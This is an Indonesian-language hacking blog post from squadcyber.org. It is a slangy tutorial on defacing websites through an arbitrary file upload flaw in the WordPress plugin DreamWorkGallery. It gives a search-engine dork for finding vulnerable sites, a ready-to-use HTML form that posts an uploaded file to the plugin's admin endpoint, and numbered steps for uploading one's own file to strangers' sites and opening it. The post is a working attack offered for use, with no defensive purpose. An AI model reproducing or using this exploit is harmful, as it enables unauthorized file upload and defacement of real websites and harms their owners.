www.squadcyber.org - Yo guys, balik lagi ma ane :v kali ini wa mau kasih tutor pepes pakek metode Wordpress Plugin DreamWorkGallery. Langsung yok :v
Bahan" :
Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/ (kembangin ea)
CSRF :
<form action="http://www.site.co.li/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value=""/>
<input type="submit" value="SIKAT!" /></form>
Langsung :v
1. Dorking pakek dork diatas
2. Kalo gini vuln :v Copy url web nya doang. Lalu masukin di CSRF nya. Ngerti lah kgk usah di jelaskan juga :v simpen dengan ext .html
3. Buka CSRF yang udah di simpen tdi lalu langsung sadja upload file kalean :v
4. Sukses? tandanya kek gitu. Copy akses file kalean lalu masukin di url :v
5. Nah sukses kan :v
Sekian dari ane :v
Maap kalo salah/kurang :v
Thanks :*






Comments
Post a Comment